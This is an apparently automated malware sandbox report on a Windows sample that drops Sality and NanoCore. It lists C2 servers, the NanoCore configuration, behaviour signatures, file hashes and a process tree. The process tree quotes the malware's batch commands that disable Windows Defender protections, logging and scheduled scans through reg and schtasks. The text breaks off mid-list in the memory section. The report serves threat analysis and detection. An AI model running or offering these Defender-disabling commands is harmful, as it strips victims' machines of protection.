Analysis

  • max time kernel
    22s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-10-2024 05:08

General

  • Target

    2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe

  • Size

    17.0MB

  • MD5

    2b66ca254c7c9100343699af457f9d81

  • SHA1

    36a13e65f57b4ed2f515e752f7ab29b68aa341c7

  • SHA256

    1fd3e2f6d6e9166cba0086664635f86ba4b4aaf1277a853cf718f6f24d672d6d

  • SHA512

    4ad6155146eecfcc5f2638772444056ed2c7ebd6867711be66cab87c3156820ce1bb179b96762ae2db3bb98fca16c0daab5e5dc9da294cb3963cd2ba3151ec85

  • SSDEEP

    393216:UHNOPJo4+k2Br1BMgUD6okK/o4CgMi4GZfT2qZV5:UtOdB2B0gmNkK/Zv4GZPV

Malware Config

Extracted

Family

sality

C2

http://89.119.67.154/testo5/

http://kukutrustnet777.info/home.gif

http://kukutrustnet888.info/home.gif

http://kukutrustnet987.info/home.gif

http://www.klkjwre9fqwieluoi.info/

http://kukutrustnet777888.info/

http://klkjwre77638dfqwieuoi888.info/

Extracted

Family

nanocore

Version

1.2.2.0

C2

hitexe.endofinternet.net:33045

Mutex

f6e3cbdc-25fe-4e6f-9495-3c5a40bf4ed0

Attributes
  • activate_away_mode

    true

  • backup_connection_host

  • backup_dns_server

    8.8.4.4

  • buffer_size

    65535

  • build_time

    2020-12-29T23:08:57.329436536Z

  • bypass_user_account_control

    true

  • bypass_user_account_control_data

  • clear_access_control

    true

  • clear_zone_identifier

    false

  • connect_delay

    4000

  • connection_port

    33045

  • default_group

    Default

  • enable_debug_mode

    true

  • gc_threshold

    1.048576e+07

  • keep_alive_timeout

    30000

  • keyboard_logging

    false

  • lan_timeout

    2500

  • max_packet_size

    1.048576e+07

  • mutex

    f6e3cbdc-25fe-4e6f-9495-3c5a40bf4ed0

  • mutex_timeout

    5000

  • prevent_system_sleep

    false

  • primary_connection_host

    hitexe.endofinternet.net

  • primary_dns_server

    8.8.8.8

  • request_elevation

    true

  • restart_delay

    5000

  • run_delay

    0

  • run_on_startup

    true

  • set_critical_process

    true

  • timeout_interval

    5000

  • use_custom_dns_server

    false

  • version

    1.2.2.0

  • wan_timeout

    8000

Signatures

  • Modifies firewall policy service 3 TTPs 6 IoCs
  • NanoCore

    NanoCore is a remote access tool (RAT) with a variety of capabilities.

  • Sality

    Sality is backdoor written in C++, first discovered in 2003.

  • UAC bypass 3 TTPs 2 IoCs
  • Windows security bypass 2 TTPs 12 IoCs
  • Disables RegEdit via registry modification 2 IoCs
  • Disables Task Manager via registry modification
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 11 IoCs
  • Windows security modification 2 TTPs 14 IoCs
  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • UPX packed file 36 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • NSIS installer 2 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 2 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\fontdrvhost.exe
    "fontdrvhost.exe"
    1⤵
      PID:792
    • C:\Windows\system32\fontdrvhost.exe
      "fontdrvhost.exe"
      1⤵
        PID:796
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        1⤵
          PID:64
        • C:\Windows\system32\sihost.exe
          sihost.exe
          1⤵
            PID:2744
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
            1⤵
              PID:2780
            • C:\Windows\system32\taskhostw.exe
              taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
              1⤵
                PID:2992
              • C:\Windows\Explorer.EXE
                C:\Windows\Explorer.EXE
                1⤵
                  PID:3428
                  • C:\Users\Admin\AppData\Local\Temp\2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe
                    "C:\Users\Admin\AppData\Local\Temp\2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe"
                    2⤵
                    • Checks computer location settings
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:3224
                    • C:\Users\Admin\AppData\Local\Temp\MsPlaying.exe
                      "C:\Users\Admin\AppData\Local\Temp\MsPlaying.exe"
                      3⤵
                      • Modifies firewall policy service
                      • UAC bypass
                      • Windows security bypass
                      • Disables RegEdit via registry modification
                      • Deletes itself
                      • Executes dropped EXE
                      • Windows security modification
                      • Checks whether UAC is enabled
                      • Drops file in Windows directory
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of SetWindowsHookEx
                      • Suspicious use of WriteProcessMemory
                      • System policy modification
                      PID:3368
                      • C:\Windows\System32\Conhost.exe
                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        4⤵
                          PID:5024
                        • C:\Windows\system32\cmd.exe
                          "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A46E.tmp\A46F.tmp\A470.bat C:\Users\Admin\AppData\Local\Temp\MsPlaying.exe"
                          4⤵
                          • Suspicious use of WriteProcessMemory
                          PID:4932
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                            5⤵
                              PID:4968
                            • C:\Windows\system32\reg.exe
                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                              5⤵
                                PID:1428
                              • C:\Windows\system32\reg.exe
                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                5⤵
                                  PID:1980
                                • C:\Windows\system32\reg.exe
                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                  5⤵
                                    PID:4516
                                  • C:\Windows\system32\reg.exe
                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                    5⤵
                                      PID:2000
                                    • C:\Windows\system32\reg.exe
                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                      5⤵
                                        PID:2984
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                        5⤵
                                          PID:1624
                                        • C:\Windows\system32\reg.exe
                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                          5⤵
                                            PID:4448
                                          • C:\Windows\system32\reg.exe
                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                            5⤵
                                              PID:1664
                                            • C:\Windows\system32\reg.exe
                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                              5⤵
                                                PID:4632
                                              • C:\Windows\system32\reg.exe
                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                5⤵
                                                  PID:1144
                                                • C:\Windows\system32\reg.exe
                                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                  5⤵
                                                    PID:1832
                                                  • C:\Windows\system32\reg.exe
                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                                                    5⤵
                                                      PID:1800
                                                    • C:\Windows\system32\reg.exe
                                                      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                      5⤵
                                                        PID:2276
                                                      • C:\Windows\system32\reg.exe
                                                        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                        5⤵
                                                          PID:1804
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                          5⤵
                                                            PID:3148
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                            5⤵
                                                              PID:3688
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                              5⤵
                                                                PID:4568
                                                              • C:\Windows\system32\schtasks.exe
                                                                schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                5⤵
                                                                  PID:3664
                                                                • C:\Windows\system32\schtasks.exe
                                                                  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                  5⤵
                                                                    PID:532
                                                                  • C:\Windows\system32\reg.exe
                                                                    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                                                    5⤵
                                                                      PID:736
                                                                    • C:\Windows\system32\reg.exe
                                                                      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                                                      5⤵
                                                                        PID:1960
                                                                      • C:\Windows\system32\reg.exe
                                                                        reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                        5⤵
                                                                          PID:3628
                                                                        • C:\Windows\system32\reg.exe
                                                                          reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                                          5⤵
                                                                            PID:3496
                                                                          • C:\Windows\system32\reg.exe
                                                                            reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                            5⤵
                                                                              PID:2680
                                                                            • C:\Windows\system32\reg.exe
                                                                              reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                              5⤵
                                                                                PID:3936
                                                                              • C:\Windows\system32\reg.exe
                                                                                reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                5⤵
                                                                                  PID:2392
                                                                                • C:\Windows\system32\reg.exe
                                                                                  reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                  5⤵
                                                                                    PID:708
                                                                                  • C:\Windows\system32\reg.exe
                                                                                    reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                    5⤵
                                                                                      PID:4856
                                                                                    • C:\Windows\system32\reg.exe
                                                                                      reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                                      5⤵
                                                                                        PID:4080
                                                                                  • C:\Users\Admin\AppData\Local\Temp\MsfUpdate.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\MsfUpdate.exe"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:4204
                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                      "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eRuAlzO" /XML "C:\Users\Admin\AppData\Local\Temp\tmp269E.tmp"
                                                                                      4⤵
                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                      PID:3340
                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        5⤵
                                                                                          PID:1804
                                                                                      • C:\Users\Admin\AppData\Local\Temp\MsfUpdate.exe
                                                                                        "{path}"
                                                                                        4⤵
                                                                                          PID:1396
                                                                                      • C:\Users\Admin\AppData\Local\Temp\nb660-full.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\nb660-full.exe"
                                                                                        3⤵
                                                                                        • Modifies firewall policy service
                                                                                        • UAC bypass
                                                                                        • Windows security bypass
                                                                                        • Disables RegEdit via registry modification
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Windows security modification
                                                                                        • Checks whether UAC is enabled
                                                                                        • Drops file in Program Files directory
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Checks processor information in registry
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • System policy modification
                                                                                        PID:1720
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                    1⤵
                                                                                      PID:3568
                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                      1⤵
                                                                                        PID:3748
                                                                                      • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                        1⤵
                                                                                          PID:3840
                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                          1⤵
                                                                                            PID:3904
                                                                                          • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                            "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                            1⤵
                                                                                              PID:3988
                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                              1⤵
                                                                                                PID:4104
                                                                                              • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
                                                                                                "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
                                                                                                1⤵
                                                                                                  PID:2412
                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                  1⤵
                                                                                                    PID:2284
                                                                                                  • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                    "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppX3bn25b6f886wmg6twh46972vprk9tnbf.mca
                                                                                                    1⤵
                                                                                                      PID:4432
                                                                                                    • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                      "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                      1⤵
                                                                                                        PID:4896
                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                        1⤵
                                                                                                          PID:1392
                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                          1⤵
                                                                                                            PID:1404
                                                                                                          • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                            "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                            1⤵
                                                                                                              PID:1980

                                                                                                            Network

                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                            Replay Monitor

                                                                                                            Loading Replay Monitor...

                                                                                                            Downloads

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\A46E.tmp\A46F.tmp\A470.bat

                                                                                                              Filesize

                                                                                                              3KB

                                                                                                              MD5

                                                                                                              665f21a9b6730aa08e62473e481b8c55

                                                                                                              SHA1

                                                                                                              717d52e75ac16bf032299828dd61c86af281eb43

                                                                                                              SHA256

                                                                                                              dcaba420b47b5527bd3761ae8a2b76bbbf387100613b7c2f256cfe9ec58fb579

                                                                                                              SHA512

                                                                                                              b3c6fe2555613f4f7b30ba434e94421c397008a999ff5c07b5df349c550ef6b4d2a8b831208ad3bb25998bf9d2fe0dbb86414ef23ef9216211ab96373d9b6f1e

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\MsPlaying.exe

                                                                                                              Filesize

                                                                                                              3.0MB

                                                                                                              MD5

                                                                                                              ab43042da67bbac3ee18248ee40d4c7e

                                                                                                              SHA1

                                                                                                              10aa258234918a4231ee9a5c222f27c8a9a4d69d

                                                                                                              SHA256

                                                                                                              fda0366362c09fe1538c6ccca5a67aba4ee3f15da38ba91276dcab13dc7ad4f1

                                                                                                              SHA512

                                                                                                              b9657448c677ee458c63d09e05edcfdb0e92168155bc39b8c34092b17dd877232d99680fbf6e952b884dd294300d4f0c56ab6f93d07f506bc017f3988ef8538c

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\MsfUpdate.exe

                                                                                                              Filesize

                                                                                                              919KB

                                                                                                              MD5

                                                                                                              a102b1ee34e498fb8458a6be30ba15e7

                                                                                                              SHA1

                                                                                                              b586c1bc68a67b6fc7762d5ce7ecae8343d8e006

                                                                                                              SHA256

                                                                                                              0b533b19d6e78fdb0e9c7c3616da7641f3b8f9a2761da345efba417a15cc72c6

                                                                                                              SHA512

                                                                                                              0b49ce905e76f643019643e9ac42aaf31cdf50ed8294420a936ccce0eca0749d1baddb3c80a28a24ca6f91cd6ff044ec6dea9b4bd5e36c65341395199848483b

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\nb660-full.exe

                                                                                                              Filesize

                                                                                                              12.5MB

                                                                                                              MD5

                                                                                                              d8865f463ff9f148fc62ca1a0e3db0fd

                                                                                                              SHA1

                                                                                                              1bdd1e03a7002261810ca0d39d785d53c2b2bb3c

                                                                                                              SHA256

                                                                                                              fd56f3d15c22eacf304b5ecd000a39158f7dd43a139d22140f28d5d621fc1fc7

                                                                                                              SHA512

                                                                                                              83e01c03754a56b546514e8bd15d84fcf5c996f472189a492070d57edbadd16e07dc17180254508589f9b56221cbb24946bc6d281bb04a000f5375d9b6b7e937

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\nsiA663.tmp\GetFLE.ini

                                                                                                              Filesize

                                                                                                              1KB

                                                                                                              MD5

                                                                                                              a7faa1243898bb160dc53c840f4e36a6

                                                                                                              SHA1

                                                                                                              c599642d9e337523e4f1722f9dda85b9953b9145

                                                                                                              SHA256

                                                                                                              f64544ba37b0287d951068172e8c2a5c7c75296e1a1ec0077af753bcf25d09d1

                                                                                                              SHA512

                                                                                                              8b90a2b38158b71bb1c55a80ca737f42297c2a58101c087ec34da270bbd2f7845c1d9140c08e1b68e79837a54b7184e5e1a83504ecc584a0074c3274a1df627e

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\nsiA663.tmp\InstallOptions.dll

                                                                                                              Filesize

                                                                                                              14KB

                                                                                                              MD5

                                                                                                              325b008aec81e5aaa57096f05d4212b5

                                                                                                              SHA1

                                                                                                              27a2d89747a20305b6518438eff5b9f57f7df5c3

                                                                                                              SHA256

                                                                                                              c9cd5c9609e70005926ae5171726a4142ffbcccc771d307efcd195dafc1e6b4b

                                                                                                              SHA512

                                                                                                              18362b3aee529a27e85cc087627ecf6e2d21196d725f499c4a185cb3a380999f43ff1833a8ebec3f5ba1d3a113ef83185770e663854121f2d8b885790115afdf

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\nsiA663.tmp\LangDLL.dll

                                                                                                              Filesize

                                                                                                              5KB

                                                                                                              MD5

                                                                                                              9384f4007c492d4fa040924f31c00166

                                                                                                              SHA1

                                                                                                              aba37faef30d7c445584c688a0b5638f5db31c7b

                                                                                                              SHA256

                                                                                                              60a964095af1be79f6a99b22212fefe2d16f5a0afd7e707d14394e4143e3f4f5

                                                                                                              SHA512

                                                                                                              68f158887e24302673227adffc688fd3edabf097d7f5410f983e06c6b9c7344ca1d8a45c7fa05553adcc5987993df3a298763477168d4842e554c4eb93b9aaaf

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\nsiA663.tmp\System.dll

                                                                                                              Filesize

                                                                                                              11KB

                                                                                                              MD5

                                                                                                              c17103ae9072a06da581dec998343fc1

                                                                                                              SHA1

                                                                                                              b72148c6bdfaada8b8c3f950e610ee7cf1da1f8d

                                                                                                              SHA256

                                                                                                              dc58d8ad81cacb0c1ed72e33bff8f23ea40b5252b5bb55d393a0903e6819ae2f

                                                                                                              SHA512

                                                                                                              d32a71aaef18e993f28096d536e41c4d016850721b31171513ce28bbd805a54fd290b7c3e9d935f72e676a1acfb4f0dcc89d95040a0dd29f2b6975855c18986f

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\nsiA663.tmp\UAC.dll

                                                                                                              Filesize

                                                                                                              13KB

                                                                                                              MD5

                                                                                                              29858669d7da388d1e62b4fd5337af12

                                                                                                              SHA1

                                                                                                              756b94898429a9025a04ae227f060952f1149a5f

                                                                                                              SHA256

                                                                                                              c24c005daa7f5578c4372b38d1be6be5e27ef3ba2cdb9b67fee15cac406eba62

                                                                                                              SHA512

                                                                                                              6f4d538f2fe0681f357bab73f633943c539ddc1451efa1d1bb76d70bb47aa68a05849e36ae405cc4664598a8194227fa7053de6dbce7d6c52a20301293b3c85f

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\nsiA663.tmp\UserInfo.dll

                                                                                                              Filesize

                                                                                                              4KB

                                                                                                              MD5

                                                                                                              7579ade7ae1747a31960a228ce02e666

                                                                                                              SHA1

                                                                                                              8ec8571a296737e819dcf86353a43fcf8ec63351

                                                                                                              SHA256

                                                                                                              564c80dec62d76c53497c40094db360ff8a36e0dc1bda8383d0f9583138997f5

                                                                                                              SHA512

                                                                                                              a88bc56e938374c333b0e33cb72951635b5d5a98b9cb2d6785073cbcad23bf4c0f9f69d3b7e87b46c76eb03ced9bb786844ce87656a9e3df4ca24acf43d7a05b

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\nsiA663.tmp\cpudesc.dll

                                                                                                              Filesize

                                                                                                              4KB

                                                                                                              MD5

                                                                                                              d25102051b33f61c9f7fb564a4556219

                                                                                                              SHA1

                                                                                                              c683964c11d5175171bd009cb08f87592c923f85

                                                                                                              SHA256

                                                                                                              e58e5d1d8da2ea526d0d754b4faad3773021166b0720723efb7b30f1f5075398

                                                                                                              SHA512

                                                                                                              8828eec31926251d7e51b5bf1050c3519c9b7fca4f978fb6ee0bf18f9642c3460687f10ff79e5892100ecadbf49725711567c348e1dfccb3644bd9ef992a92f0

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\nsiA663.tmp\nsDialogs.dll

                                                                                                              Filesize

                                                                                                              9KB

                                                                                                              MD5

                                                                                                              c10e04dd4ad4277d5adc951bb331c777

                                                                                                              SHA1

                                                                                                              b1e30808198a3ae6d6d1cca62df8893dc2a7ad43

                                                                                                              SHA256

                                                                                                              e31ad6c6e82e603378cb6b80e67d0e0dcd9cf384e1199ac5a65cb4935680021a

                                                                                                              SHA512

                                                                                                              853a5564bf751d40484ea482444c6958457cb4a17fb973cf870f03f201b8b2643be41bccde00f6b2026dc0c3d113e6481b0dc4c7b0f3ae7966d38c92c6b5862e

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\tmp269E.tmp

                                                                                                              Filesize

                                                                                                              1KB

                                                                                                              MD5

                                                                                                              d59570d1684c23b4ac8382a8ee20e096

                                                                                                              SHA1

                                                                                                              a3027352e6ff1138652462936442d6ed03888826

                                                                                                              SHA256

                                                                                                              1ceb22ffeb0df77e03de3be0f94a348a71b9bf5001eec55a140a02d04f3cd16c

                                                                                                              SHA512

                                                                                                              7bbc949cecc0b12bee33ddbf435d1fd40f170142ee0de68441f35c4f71a126983ac44fb40c6efdc9d9913b8210142ee520bf6ebe7b1aa2b62897a57205d38a2b

                                                                                                            • C:\Windows\SYSTEM.INI

                                                                                                              Filesize

                                                                                                              257B

                                                                                                              MD5

                                                                                                              9ffdd056d650059d3a423a4948692cd1

                                                                                                              SHA1

                                                                                                              b77f720c12e6d3114384b5a55a9a13c35019a62a

                                                                                                              SHA256

                                                                                                              80d69ec2f2b5906f27dbc752932ab45030b91cb4eefc34eb3354642b0fe9041e

                                                                                                              SHA512

                                                                                                              124e3df2202dfd3ae5d628e918092340c0ba4a2cfd3a61bb14d37f1eda87ebac2f2b74c95e55bdc2d2299b055a7e0aa6041211d663cd5f9b2e5eaee0410f8f43

                                                                                                            • memory/1396-209-0x0000000004E10000-0x0000000004E1A000-memory.dmp

                                                                                                              Filesize

                                                                                                              40KB

                                                                                                            • memory/1396-207-0x0000000000400000-0x0000000000438000-memory.dmp

                                                                                                              Filesize

                                                                                                              224KB

                                                                                                            • memory/1396-210-0x0000000005090000-0x00000000050AE000-memory.dmp

                                                                                                              Filesize

                                                                                                              120KB

                                                                                                            • memory/1396-211-0x0000000005AB0000-0x0000000005ABA000-memory.dmp

                                                                                                              Filesize

                                                                                                              40KB

                                                                                                            • memory/1720-49-0x00000000022F0000-0x00000000022F1000-memory.dmp

                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/1720-149-0x0000000004FB0000-0x000000000603E000-memory.dmp

                                                                                                              Filesize

                                                                                                              16.6MB

                                                                                                            • memory/1720-162-0x0000000004FB0000-0x000000000603E000-memory.dmp

                                                                                                              Filesize

                                                                                                              16.6MB

                                                                                                            • memory/1720-54-0x0000000000520000-0x0000000000522000-memory.dmp

                                                                                                              Filesize

                                                                                                              8KB

                                                                                                            • memory/1720-148-0x0000000004FB0000-0x000000000603E000-memory.dmp

                                                                                                              Filesize

                                                                                                              16.6MB

                                                                                                            • memory/1720-160-0x0000000004FB0000-0x000000000603E000-memory.dmp

                                                                                                              Filesize

                                                                                                              16.6MB

                                                                                                            • memory/1720-45-0x0000000000400000-0x000000000046D000-memory.dmp

                                                                                                              Filesize

                                                                                                              436KB

                                                                                                            • memory/1720-158-0x0000000004FB0000-0x000000000603E000-memory.dmp

                                                                                                              Filesize

                                                                                                              16.6MB

                                                                                                            • memory/1720-157-0x0000000004FB0000-0x000000000603E000-memory.dmp

                                                                                                              Filesize

                                                                                                              16.6MB

                                                                                                            • memory/1720-155-0x0000000004FB0000-0x000000000603E000-memory.dmp

                                                                                                              Filesize

                                                                                                              16.6MB

                                                                                                            • memory/1720-154-0x0000000004FB0000-0x000000000603E000-memory.dmp

                                                                                                              Filesize

                                                                                                              16.6MB

                                                                                                            • memory/1720-152-0x0000000004FB0000-0x000000000603E000-memory.dmp

                                                                                                              Filesize

                                                                                                              16.6MB

                                                                                                            • memory/1720-151-0x0000000004FB0000-0x000000000603E000-memory.dmp

                                                                                                              Filesize

                                                                                                              16.6MB

                                                                                                            • memory/1720-163-0x0000000004FB0000-0x000000000603E000-memory.dmp

                                                                                                              Filesize

                                                                                                              16.6MB

                                                                                                            • memory/1720-150-0x0000000004FB0000-0x000000000603E000-memory.dmp

                                                                                                              Filesize

                                                                                                              16.6MB

                                                                                                            • memory/1720-144-0x0000000004FB0000-0x000000000603E000-memory.dmp

                                                                                                              Filesize

                                                                                                              16.6MB

                                                                                                            • memory/1720-139-0x0000000004FB0000-0x000000000603E000-memory.dmp

                                                                                                              Filesize

                                                                                                              16.6MB

                                                                                                            • memory/1720-141-0x0000000004FB0000-0x000000000603E000-memory.dmp

                                                                                                              Filesize

                                                                                                              16.6MB

                                                                                                            • memory/1720-142-0x0000000004FB0000-0x000000000603E000-memory.dmp

                                                                                                              Filesize

                                                                                                              16.6MB

                                                                                                            • memory/1720-146-0x0000000004FB0000-0x000000000603E000-memory.dmp

                                                                                                              Filesize

                                                                                                              16.6MB

                                                                                                            • memory/1720-145-0x0000000004FB0000-0x000000000603E000-memory.dmp

                                                                                                              Filesize

                                                                                                              16.6MB

                                                                                                            • memory/1720-147-0x0000000004FB0000-0x000000000603E000-memory.dmp

                                                                                                              Filesize

                                                                                                              16.6MB

                                                                                                            • memory/1720-164-0x0000000004FB0000-0x000000000603E000-memory.dmp

                                                                                                              Filesize

                                                                                                              16.6MB

                                                                                                            • memory/1720-167-0x0000000004FB0000-0x000000000603E000-memory.dmp

                                                                                                              Filesize

                                                                                                              16.6MB

                                                                                                            • memory/1720-386-0x0000000000400000-0x000000000046D000-memory.dmp

